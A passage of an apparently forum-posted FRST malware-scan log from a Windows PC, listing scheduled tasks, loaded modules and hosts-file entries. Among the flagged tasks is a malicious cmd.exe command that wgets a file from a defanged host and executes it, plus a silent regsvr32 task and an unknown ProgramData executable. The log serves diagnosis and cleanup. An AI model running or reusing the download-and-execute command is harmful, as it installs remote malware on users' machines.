{B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\winrar\rarext32.dll [2015-03-09] (Alexander Roshal) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0B88ADD1-EF0D-4194-925F-E139B3E201CB} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation) Task: {0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {12019626-691F-462A-877A-54009CA8FFE1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=KEy9HdgPlS;Nero_BurningROM2014-15.0.03900_trial.exe;1423482306 & start cmd /R dat.bmp <==== ATTENTION Task: {1D988B57-D73F-4115-8064-2590AEC83848} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2016-12-13] (NVIDIA Corporation) Task: {1DA05B72-C9FF-464B-86D9-3F8A33B4120C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {1E3A0105-8ADF-4199-84A6-4F73633F7D7D} - System32\Tasks\{A8E4232D-58D8-4923-8B98-7CCC80B90164} => d:\vivaldi\application\vivaldi.exe [2017-06-14] (Vivaldi Technologies AS) Task: {1FCB9178-9830-49C3-89F5-DC342024EE28} - System32\Tasks\{55F8496A-A085-4AAB-9E43-B090C3019AA4} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.dat" -a uninstallme 7522E4EA-1ACE-45A4-BBF9-129B9513C307 DeviceId=05f8e6e5-c3c4-050f-79c2-e538d8beee67 BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet Task: {2642E736-FA85-461F-89C9-840FC12D3CEB} - System32\Tasks\{A7E22440-5F15-4B37-9146-A321FB610FC5} => d:\vivaldi\application\vivaldi.exe [2017-06-14] (Vivaldi Technologies AS) Task: {2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218} - System32\Tasks\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_uninst.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {31A648D9-6289-4BBD-8228-CB17BB7832D0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-12-13] (NVIDIA Corporation) Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {38911EC9-5A2E-45EF-933F-368D48ADD526} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-12-13] (NVIDIA Corporation) Task: {4F1317DE-1A9F-4611-84C5-9DC111BBB231} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-09] (Adobe Systems Incorporated) Task: {620A87CB-88AA-4B0D-9992-9FABA4DE2CDC} - System32\Tasks\FileFly => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION Task: {6806C370-BCB9-4A0D-B571-582DCE593412} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-05] (Google Inc.) Task: {6BFCFAF3-E8EA-4CDC-B4E5-8FC01DDD3296} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_28_0_0_137_pepper.exe [2018-01-09] (Adobe Systems Incorporated) Task: {74DC3443-7AA0-4E36-9599-B74A9C5969A0} - System32\Tasks\{D19480A7-1C66-4718-A8E7-F7E7E50BF497} => C:\WINDOWS\system32\pcalua.exe -a "D:\FIFA 14\FIFA 14\ModdingWayInstaller.exe" -d "D:\FIFA 14\FIFA 14" Task: {770B9597-E2AE-4BB0-895C-A38B09C55C11} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {7DEA7A48-3471-400A-A2B0-5BA365DEA500} - System32\Tasks\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsPlugin Task: {7E8FE418-B5EF-446D-9293-4B095C5FB793} - System32\Tasks\{F7606602-E4E6-4ABA-B255-0B35486D49BB} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_code.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support" Task: {8B46E8C1-AEFC-49D1-8522-02E4C45F912D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {8C2E15C1-320F-4ABE-86FC-90F78F6A8E48} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {9248F670-676C-4190-AB1A-44DD598710D2} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {925008C3-C2E0-45EA-824E-A0FB3464D2A0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation) Task: {9B4F6793-CF3F-4D89-8741-97367C230EE1} - System32\Tasks\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F} => C:\WINDOWS\system32\pcalua.exe -a D:\KMSpico\unins000.exe Task: {9E88CD04-A2E3-41EA-A63F-5E8F99686800} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E} - System32\Tasks\4B55B688-1080-8A52-689E-71FB723AAFC3 => C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/4ba6e1555c879c97 /q" "C:\Users\Kuba\AppData\Local\348936~1\{8BE76~1." Task: {A580D6D6-0F70-401B-AC23-9D0447169436} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\MpCmdRun.exe [2018-01-20] (Microsoft Corporation) Task: {A6E6DF91-3162-4136-80FC-2D926F0D4D94} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\MpCmdRun.exe [2018-01-20] (Microsoft Corporation) Task: {A8501E61-5536-4C11-9181-F68D426FE875} - System32\Tasks\WiseCleaner\WASSkipUAC => D:\Wise Auto Shutdown\WiseAutoShutdown.exe [2015-08-10] (WiseCleaner.COM) Task: {A9C6D8D2-AEE5-474D-8C60-66DABD48A890} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-05] (Google Inc.) Task: {AE730B5C-AA2D-4934-8282-52990AE0314A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {BDC3B86E-42DF-4618-A1D5-66B410F42298} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\MpCmdRun.exe [2018-01-20] (Microsoft Corporation) Task: {C3B9D0C9-5271-42B1-A4CD-E31139294E43} - System32\Tasks\{19B825F8-9F85-4BF6-827A-627D610B159C} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsBing Task: {C7B9E475-A928-4CE2-B971-801A5A22FDAA} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation) Task: {CFBF0E7F-1CBF-4855-82B0-6EDB908AF560} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {D4686AC8-5458-4B85-940E-907BCC7A1D35} - System32\Tasks\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsInstall Task: {DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: {E30B6B01-BA5F-486D-AD20-2C607E8FFDAF} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation) Task: {E9653144-3787-4878-A133-BE9CAD8AB2FE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\MpCmdRun.exe [2018-01-20] (Microsoft Corporation) Task: {F435FF33-2873-4907-B887-3D1BE8DCD939} - System32\Tasks\{F5AC14EC-7A8D-4160-B142-2C8CFB78161E} => d:\vivaldi\application\vivaldi.exe [2017-06-14] (Vivaldi Technologies AS) Task: {F8FF0C4C-A639-4559-9E64-F8CB522CAF7D} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\FileFly.job => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Kuba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki Shortcut: C:\Users\Kuba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com ==================== Loaded Modules (Whitelisted) ============== 2017-09-29 14:41 - 2017-09-29 14:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-06-06 17:20 - 2016-11-14 12:15 - 000135224 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2016-10-12 20:46 - 2016-12-13 00:36 - 004489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll 2016-10-12 20:46 - 2016-12-13 00:35 - 001147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2016-10-25 09:57 - 2016-10-25 09:57 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll 2017-12-08 10:09 - 2017-12-08 10:09 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-12-08 10:09 - 2017-12-08 10:09 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2018-01-18 19:10 - 2018-01-18 19:11 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.274.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2018-01-18 19:10 - 2018-01-18 19:11 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.274.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2018-01-18 19:10 - 2018-01-18 19:12 - 024677376 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.274.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2018-01-03 18:01 - 2018-01-03 18:01 - 002550272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.274.0_x64__kzf8qxf38zg5c\skypert.dll 2018-01-18 19:10 - 2018-01-18 19:11 - 000667648 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.274.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll 2017-12-22 15:21 - 2017-12-22 15:21 - 002945024 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.3.3472.0_x64__8wekyb3d8bbwe\People.BackgroundTasks.dll 2017-12-22 15:21 - 2017-12-22 15:21 - 000130560 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.3.3472.0_x64__8wekyb3d8bbwe\PeopleUtilRT.Windows.dll 2017-12-22 15:21 - 2017-12-22 15:21 - 007848448 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.3.3472.0_x64__8wekyb3d8bbwe\Microsoft.People.NativeComponents.dll 2018-01-20 16:14 - 2018-01-20 16:15 - 000061952 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11712.1001.13.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll 2017-11-20 15:27 - 2017-11-20 15:27 - 041061856 _____ () C:\Program Files (x86)\Google\Drive\googledrivesync.exe 2016-10-12 20:46 - 2016-12-13 00:35 - 000018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2016-10-12 20:46 - 2016-12-13 00:35 - 003774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll 2016-10-12 20:46 - 2016-12-13 00:35 - 000900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll 2018-01-26 18:34 - 2018-01-26 18:35 - 000088064 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_ctypes.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000919552 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_hashlib.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000098816 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32api.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000110080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\pywintypes27.dll 2018-01-26 18:35 - 2018-01-26 18:35 - 000364544 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\pythoncom27.dll 2018-01-26 18:35 - 2018-01-26 18:35 - 000686080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\unicodedata.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000320512 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32com.shell.shell.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 001177088 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._core_.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000806912 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._gdi_.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000816640 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._windows_.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 001067520 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._controls_.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000733696 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._misc_.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000736256 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\pysqlite2._sqlite.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000119808 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32file.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000108544 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32security.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000007168 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\hashobjs_ext.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000017920 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\thumbnails_ext.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000082432 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\usb_ext.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000013824 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\common.time34.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000018432 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32event.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000027648 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\windows.conditional.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000017408 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\windows.winwrap.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000089088 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\windows.volumes.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000167936 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32gui.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000046080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_socket.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 001311744 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_ssl.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000129536 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_elementtree.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000127488 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\pyexpat.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000038912 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32inet.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000077824 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\wx._html2.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000036864 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_psutil_windows.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000524248 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\windows._lib_cacheinvalidation.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000011264 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32crypt.pyd 2018-01-26 18:34 - 2018-01-26 18:34 - 000218624 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\PIL._imaging.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000027648 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_multiprocessing.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000020480 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\_yappi.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000035840 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32process.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000024064 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32pipe.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000010240 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\select.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000025600 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32pdh.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000059392 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\windows.device_monitor.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000017408 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32profile.pyd 2018-01-26 18:35 - 2018-01-26 18:35 - 000022528 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI79242\win32ts.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000088064 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_ctypes.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000919552 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_hashlib.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000098816 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32api.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000110080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\pywintypes27.dll 2018-01-26 18:36 - 2018-01-26 18:36 - 000364544 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\pythoncom27.dll 2018-01-26 18:36 - 2018-01-26 18:36 - 000686080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\unicodedata.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000320512 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32com.shell.shell.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 001177088 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._core_.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000806912 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._gdi_.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000816640 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._windows_.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 001067520 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._controls_.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000733696 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._misc_.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000736256 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\pysqlite2._sqlite.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000119808 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32file.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000108544 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32security.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000007168 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\hashobjs_ext.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000017920 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\thumbnails_ext.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000082432 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\usb_ext.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000013824 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\common.time34.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000018432 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32event.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000027648 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\windows.conditional.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000017408 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\windows.winwrap.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000089088 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\windows.volumes.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000167936 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32gui.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000046080 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_socket.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 001311744 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_ssl.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000129536 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_elementtree.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000127488 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\pyexpat.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000038912 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32inet.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000077824 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\wx._html2.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000036864 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_psutil_windows.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000524248 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\windows._lib_cacheinvalidation.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000011264 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32crypt.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000218624 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\PIL._imaging.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000027648 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_multiprocessing.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000020480 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\_yappi.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000035840 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32process.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000024064 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32pipe.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000010240 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\select.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000025600 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32pdh.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000059392 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\windows.device_monitor.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000017408 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32profile.pyd 2018-01-26 18:36 - 2018-01-26 18:36 - 000022528 _____ () C:\Users\Kuba\AppData\Local\Temp\_MEI37562\win32ts.pyd 2016-10-12 20:46 - 2016-12-12 15:36 - 000525760 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node 2016-10-12 20:46 - 2016-12-12 15:36 - 000254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node 2016-10-12 20:46 - 2016-12-12 15:36 - 002808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node 2017-06-20 16:42 - 2017-06-14 13:38 - 002946680 _____ () D:\Vivaldi\Application\1.10.867.38\libglesv2.dll 2017-06-20 16:42 - 2017-06-14 13:38 - 000087160 _____ () D:\Vivaldi\Application\1.10.867.38\libegl.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352] AlternateDataStreams: C:\ProgramData\TEMP:D78D6FF7 [154] ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-12-05 22:31 - 2018-01-24 18:43 - 000003214 _____ C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 vortex.data.microsoft.com 127.0.0.1 vortex-win.data.microsoft.com 127.0.0.1 telecommand.telemetry.microsoft.com 127.0.0.1 telecommand.telemetry.microsoft.com.nsatc.net 127.0.0.1 oca.telemetry.microsoft.com 127.0.0.1 oca.telemetry.microsoft.com.nsatc.net 127.0.0.1 sqm.telemetry.microsoft.com 127.0.0.1 sqm.telemetry.microsoft.com.nsatc.net 127.0.0.1 watson.telemetry.microsoft.com 127.0.0.1 